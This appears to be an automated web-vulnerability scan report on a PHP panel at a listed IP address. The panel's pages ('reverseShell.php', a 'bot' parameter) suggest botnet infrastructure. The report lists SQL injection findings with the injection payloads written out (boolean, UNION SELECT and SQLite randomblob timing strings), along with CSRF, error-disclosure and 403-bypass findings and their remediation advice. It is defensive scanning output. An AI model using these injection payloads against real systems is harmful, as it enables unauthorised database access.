URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter key
Attack EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW' AND '1'='1' --
Evidence
Request Header - size: 1,061 bytes.
Request Body - size: 208 bytes.
Response Header - size: 252 bytes.
Response Body - size: 0 bytes.
Instances 3
Solution
Do not trust client-side input, even if there is client-side validation in place.

In general, type check all data on the server side.

If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'

If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.

If database Stored Procedures can be used, use them.

Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!

Do not create dynamic SQL queries using simple string concatenation.

Escape all data received from the client.

Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.

Apply the principle of least privilege by using the least privileged database user possible.

In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.

Grant the minimum database access that is necessary for the application.
Reference https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
Tags OWASP_2021_A03
WSTG-v42-INPV-05
OWASP_2017_A01
CWE Id 89
WASC Id 19
Plugin Id 40018
High
SQL Injection - SQLite
Description
SQL injection may be possible.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method GET
Parameter query
Attack query" | case randomblob(100000) when not null then "" else "" end --
Evidence The query time is controllable using parameter value [query" | case randomblob(100000) when not null then "" else "" end --], which caused the request to take [1,062] milliseconds, parameter value [query" | case randomblob(10000000) when not null then "" else "" end --], which caused the request to take [2,143] milliseconds, when the original unmodified query with value [query] took [455] milliseconds.
Request Header - size: 319 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi%25'%20%20--
Method GET
Parameter query
Attack case randomblob(10000000) when not null then 1 else 1 end
Evidence The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end ], which caused the request to take [2,172] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end ], which caused the request to take [4,246] milliseconds, when the original unmodified query with value [query] took [1,458] milliseconds.
Request Header - size: 494 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter key
Attack case randomblob(100000) when not null then 1 else 1 end
Evidence The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end ], which caused the request to take [1,097] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end ], which caused the request to take [2,074] milliseconds, when the original unmodified query with value [EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW] took [867] milliseconds.
Request Header - size: 298 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter key
Attack case randomblob(100000) when not null then 1 else 1 end
Evidence The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end ], which caused the request to take [347] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end ], which caused the request to take [828] milliseconds, when the original unmodified query with value [EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW] took [191] milliseconds.
Request Header - size: 252 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter key
Attack case randomblob(100000) when not null then 1 else 1 end
Evidence The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end ], which caused the request to take [363] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end ], which caused the request to take [608] milliseconds, when the original unmodified query with value [EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW] took [92] milliseconds.
Request Header - size: 252 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter key
Attack case randomblob(100000000) when not null then 1 else 1 end
Evidence The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end ], which caused the request to take [776] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end ], which caused the request to take [848] milliseconds, when the original unmodified query with value [EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW] took [233] milliseconds.
Request Header - size: 255 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects
Method GET
Parameter 327qi
Attack " | case randomblob(100000) when not null then "" else "" end | "
Evidence The query time is controllable using parameter value [" | case randomblob(100000) when not null then "" else "" end | "], which caused the request to take [776] milliseconds, parameter value [" | case randomblob(10000000) when not null then "" else "" end | "], which caused the request to take [2,260] milliseconds, when the original unmodified query with value [327qi] took [535] milliseconds.
Request Header - size: 531 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects
Method GET
Parameter query
Attack case randomblob(100000000) when not null then 1 else 1 end
Evidence The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end ], which caused the request to take [1,609] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end ], which caused the request to take [1,848] milliseconds, when the original unmodified query with value [query] took [2,021] milliseconds.
Request Header - size: 313 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav
Method GET
Parameter 327qi
Attack 327qi * case randomblob(100000) when not null then 1 else 1 end
Evidence The query time is controllable using parameter value [327qi * case randomblob(100000) when not null then 1 else 1 end ], which caused the request to take [1,798] milliseconds, parameter value [327qi * case randomblob(10000000) when not null then 1 else 1 end ], which caused the request to take [3,873] milliseconds, when the original unmodified query with value [327qi] took [1,017] milliseconds.
Request Header - size: 522 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav
Method GET
Parameter error.wav
Attack " | case randomblob(100000) when not null then "" else "" end | "
Evidence The query time is controllable using parameter value [" | case randomblob(100000) when not null then "" else "" end | "], which caused the request to take [1,912] milliseconds, parameter value [" | case randomblob(10000000) when not null then "" else "" end | "], which caused the request to take [2,091] milliseconds, when the original unmodified query with value [error.wav] took [1,200] milliseconds.
Request Header - size: 537 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav
Method GET
Parameter Sound Effects
Attack " | case randomblob(1000000) when not null then "" else "" end | "
Evidence The query time is controllable using parameter value [" | case randomblob(1000000) when not null then "" else "" end | "], which caused the request to take [1,739] milliseconds, parameter value [" | case randomblob(100000000) when not null then "" else "" end | "], which caused the request to take [3,633] milliseconds, when the original unmodified query with value [Sound Effects] took [1,807] milliseconds.
Request Header - size: 532 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter Accept
Attack case randomblob(10000000) when not null then 1 else 1 end
Evidence The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end ], which caused the request to take [1,045] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end ], which caused the request to take [2,271] milliseconds, when the original unmodified query with value [text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7] took [909] milliseconds.
Request Header - size: 671 bytes.
Request Body - size: 0 bytes.
Response Header - size: 255 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter host
Attack " | case randomblob(100000) when not null then "" else "" end | "
Evidence The query time is controllable using parameter value [" | case randomblob(100000) when not null then "" else "" end | "], which caused the request to take [182] milliseconds, parameter value [" | case randomblob(10000000) when not null then "" else "" end | "], which caused the request to take [254] milliseconds, when the original unmodified query with value [142.202.242.172] took [179] milliseconds.
Request Header - size: 799 bytes.
Request Body - size: 0 bytes.
Response Header - size: 206 bytes.
Response Body - size: 325 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter key
Attack ' | case randomblob(100000) when not null then "" else "" end | '
Evidence The query time is controllable using parameter value [' | case randomblob(100000) when not null then "" else "" end | '], which caused the request to take [761] milliseconds, parameter value [' | case randomblob(10000000) when not null then "" else "" end | '], which caused the request to take [2,198] milliseconds, when the original unmodified query with value [EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW] took [228] milliseconds.
Request Header - size: 725 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter key
Attack case randomblob(100000) when not null then 1 else 1 end
Evidence The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end ], which caused the request to take [550] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end ], which caused the request to take [1,134] milliseconds, when the original unmodified query with value [EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW] took [87] milliseconds.
Request Header - size: 240 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter key
Attack case randomblob(100000000) when not null then 1 else 1 end
Evidence The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end ], which caused the request to take [363] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end ], which caused the request to take [728] milliseconds, when the original unmodified query with value [EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW] took [95] milliseconds.
Request Header - size: 243 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter bot
Attack case randomblob(100000000) when not null then 1 else 1 end
Evidence The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end ], which caused the request to take [499] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end ], which caused the request to take [1,482] milliseconds, when the original unmodified query with value [DESKTOP-95IQEEV] took [2,031] milliseconds.
Request Header - size: 818 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54&task_select=1&params=%27+UNION+SELECT+%40%40version+--+-&unit_EXEC=18.9&limit=%27+UNION+SELECT+%40%40version+--+-&dllFunction=&customArgs=
Method GET
Parameter limit
Attack case randomblob(100000) when not null then 1 else 1 end
Evidence The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end ], which caused the request to take [947] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end ], which caused the request to take [1,144] milliseconds, when the original unmodified query with value [' UNION SELECT @@version -- -] took [769] milliseconds.
Request Header - size: 997 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method POST
Parameter 327qi
Attack case randomblob(1000000) when not null then 1 else 1 end
Evidence The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end ], which caused the request to take [1,236] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end ], which caused the request to take [1,418] milliseconds, when the original unmodified query with value [327qi] took [1,641] milliseconds.
Request Header - size: 319 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter key
Attack case randomblob(100000) when not null then 1 else 1 end
Evidence The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end ], which caused the request to take [366] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end ], which caused the request to take [581] milliseconds, when the original unmodified query with value [EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW] took [146] milliseconds.
Request Header - size: 554 bytes.
Request Body - size: 33 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter key
Attack case randomblob(100000) when not null then 1 else 1 end
Evidence The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end ], which caused the request to take [501] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end ], which caused the request to take [986] milliseconds, when the original unmodified query with value [EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW] took [127] milliseconds.
Request Header - size: 554 bytes.
Request Body - size: 33 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
Instances 21
Solution
Do not trust client-side input, even if there is client-side validation in place.

In general, type check all data on the server side.

If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'

If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.

If database Stored Procedures can be used, use them.

Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!

Do not create dynamic SQL queries using simple string concatenation.

Escape all data received from the client.

Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.

Apply the principle of least privilege by using the least privileged database user possible.

In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.

Grant the minimum database access that is necessary for the application.
Reference https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
Tags OWASP_2021_A03
WSTG-v42-INPV-05
OWASP_2017_A01
CWE Id 89
WASC Id 19
Plugin Id 40024
Medium
Absence of Anti-CSRF Tokens
Description
No Anti-CSRF tokens were found in an HTML submission form.

A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

CSRF attacks are effective in a number of situations, including:

* The victim has an active session on the target site.

* The victim is authenticated via HTTP auth on the target site.

* The victim is on the same local network as the target site.

CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence <form action="" method="POST">
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence <form action="" method="POST">
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter
Attack
Evidence <form action="" method="POST">
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter
Attack
Evidence <form action="" method="GET">
Request Header - size: 741 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter
Attack
Evidence <form action="" method="GET">
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 365 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter
Attack
Evidence <form method="POST">
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 367 bytes.
Response Body - size: 14,616 bytes.
Instances 6
Solution
Phase: Architecture and Design

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

For example, use anti-CSRF packages such as the OWASP CSRFGuard.

Phase: Implementation

Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

Phase: Architecture and Design

Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

Note that this can be bypassed using XSS.

Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

Note that this can be bypassed using XSS.

Use the ESAPI Session Management control.

This control includes a component for CSRF.

Do not use the GET method for any request that triggers a state change.

Phase: Implementation

Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.
Reference https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html
https://cwe.mitre.org/data/definitions/352.html
Tags OWASP_2021_A01
WSTG-v42-SESS-05
OWASP_2017_A05
CWE Id 352
WASC Id 9
Plugin Id 10202
Medium
Anti-CSRF Tokens Check
Description
A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

CSRF attacks are effective in a number of situations, including:

* The victim has an active session on the target site.

* The victim is authenticated via HTTP auth on the target site.

* The victim is on the same local network as the target site.

CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence <form action="" method="POST">
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence <form action="" method="POST">
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter
Attack
Evidence <form action="" method="POST">
Request Header - size: 603 bytes.
Request Body - size: 57 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
Instances 3
Solution
Phase: Architecture and Design

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

For example, use anti-CSRF packages such as the OWASP CSRFGuard.

Phase: Implementation

Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

Phase: Architecture and Design

Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

Note that this can be bypassed using XSS.

Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

Note that this can be bypassed using XSS.

Use the ESAPI Session Management control.

This control includes a component for CSRF.

Do not use the GET method for any request that triggers a state change.

Phase: Implementation

Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.
Reference https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html
https://cwe.mitre.org/data/definitions/352.html
Tags OWASP_2021_A05
WSTG-v42-SESS-05
OWASP_2017_A06
CWE Id 352
WASC Id 9
Plugin Id 20012
Medium
Application Error Disclosure
Description
This page contains an error/warning message that may disclose sensitive information like the location of the file that produced the unhandled exception. This information can be used to launch further attacks against the web application. The alert could be a false positive if the error message is found inside a documentation page.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter
Attack
Evidence <b>Warning</b>: Undefined array key "id" in <b>C:\xampp\htdocs\TQUIA729JAULAMJS\tasks_page.php</b> on line <b>20</b><br />
Request Header - size: 459 bytes.
Request Body - size: 0 bytes.
Response Header - size: 389 bytes.
Response Body - size: 131 bytes.
URL http://142.202.242.172/xampp/
Method GET
Parameter
Attack
Evidence Parent Directory
Request Header - size: 189 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=A
Method GET
Parameter
Attack
Evidence Parent Directory
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=D
Method GET
Parameter
Attack
Evidence Parent Directory
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=A
Method GET
Parameter
Attack
Evidence Parent Directory
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=D
Method GET
Parameter
Attack
Evidence Parent Directory
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=A
Method GET
Parameter
Attack
Evidence Parent Directory
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=D
Method GET
Parameter
Attack
Evidence Parent Directory
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=A
Method GET
Parameter
Attack
Evidence Parent Directory
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=D
Method GET
Parameter
Attack
Evidence Parent Directory
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
Instances 10
Solution
Review the source code of this page. Implement custom error pages. Consider implementing a mechanism to provide a unique error reference/identifier to the client (browser) while logging the details on the server side and not exposing them to the user.
Reference
Tags WSTG-v42-ERRH-02
WSTG-v42-ERRH-01
OWASP_2021_A05
OWASP_2017_A06
CWE Id 200
WASC Id 13
Plugin Id 90022
Medium
Bypassing 403
Description
Bypassing 403 endpoints may be possible: the scan rule sent a payload that caused the response to be accessible (status code 200).
URL http://142.202.242.172/
Method GET
Parameter
Attack x-original-url: /TQUIA729JAULAMJS
Evidence
Request Header - size: 184 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/
Method GET
Parameter
Attack x-original-url: /TQUIA729JAULAMJS/Sound%20Effects
Evidence
Request Header - size: 200 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
Instances 2
Solution
Reference https://www.acunetix.com/blog/articles/a-fresh-look-on-reverse-proxy-related-attacks/
https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
https://www.contextis.com/en/blog/server-technologies-reverse-proxy-bypass
Tags OWASP_2021_A01
WSTG-v42-ATHN-04
OWASP_2017_A05
CWE Id
WASC Id
Plugin Id 40038
Medium
Content Security Policy (CSP) Header Not Set
Description
